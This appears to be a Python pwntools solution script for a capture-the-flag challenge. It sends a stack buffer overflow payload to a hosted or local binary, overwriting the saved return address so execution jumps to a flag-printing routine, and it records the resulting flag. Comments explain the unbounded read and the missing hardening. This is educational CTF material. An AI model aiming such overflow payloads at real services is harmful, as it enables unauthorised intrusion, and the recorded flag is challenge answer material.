- from pwn import *
- from termcolor import colored, cprint
- import random
- import sys
# Choose the tube that hackIt() drives. With a command-line argument the script
# starts that file as a local process (the author ran it as
# `python guessing.py guessing`); with none it connects to the hosted service.
if len(sys.argv) <= 1:
    HOST = "103.237.98.32"
    PORT = 25032
    r = remote(HOST, PORT)
else:
    r = process(sys.argv[1])
    # Show the child's PID and wait for Enter so a debugger can be attached
    # before any input is sent. Python 2 syntax: with a single parenthesised
    # argument the print statement emits the same text as the bare form.
    print(colored("attach %d\n" % r.pid, "yellow"))
    raw_input("debug?")

# Code address that hackIt() packs into its round-3 reply as the new return
# address. Presumably the routine in the challenge binary that prints the
# flag -- confirm against the binary. A hard-coded address like this is only
# stable when the binary is not built position-independent (inferred from the
# 0x0804.... value, not verified here).
FLAG = 0x080487C5
def hackIt():
    """Answer the three "Round N: " prompts, then go interactive.

    Rounds 1 and 2 get the short replies "1" and "2". The round-3 reply is
    16 filler bytes followed by FLAG packed as a 32-bit little-endian value;
    per the author's layout notes the filler spans a local at ebp-0x4, the
    stack-alignment gap and the saved ebp, so the packed value lands on the
    saved return address.

    Reads the module-level tube ``r`` and the constant ``FLAG``.

    NOTE(review): that a 20-byte line reaches the return address suggests the
    round-3 read is not bounded to its buffer and that the binary was built
    without a stack protector (inferred from this script, not from the
    binary). Bounding the read is the fix; stack canaries and a
    position-independent build are the hardening that would make a fixed
    return address unusable.
    """
    segments = [
        "A" * 4,    # ebp-0x4
        "B" * 8,    # .text:08048640 and esp, 0FFFFFFF0h (stack alignment)
        "C" * 4,    # ebp
        p32(FLAG),  # return
    ]
    payload = "".join(segments)

    # Same prompt/reply order as the service presents it: wait for each
    # "Round N: " prompt before sending that round's line.
    replies = ("1", "2", payload)
    for round_no, reply in enumerate(replies, 1):
        r.recvuntil("Round %d: " % round_no)
        r.sendline(reply)

    # Hand the session to the terminal to read whatever the service prints.
    r.interactive()
# Run the exchange once against the tube selected at module level.
hackIt()
# Presumably the flag the service returned, as recorded by the paste's author:
# WhiteHat{7c952a8d157bbeb44dcc7ab9d9c6ba78e40b96bd}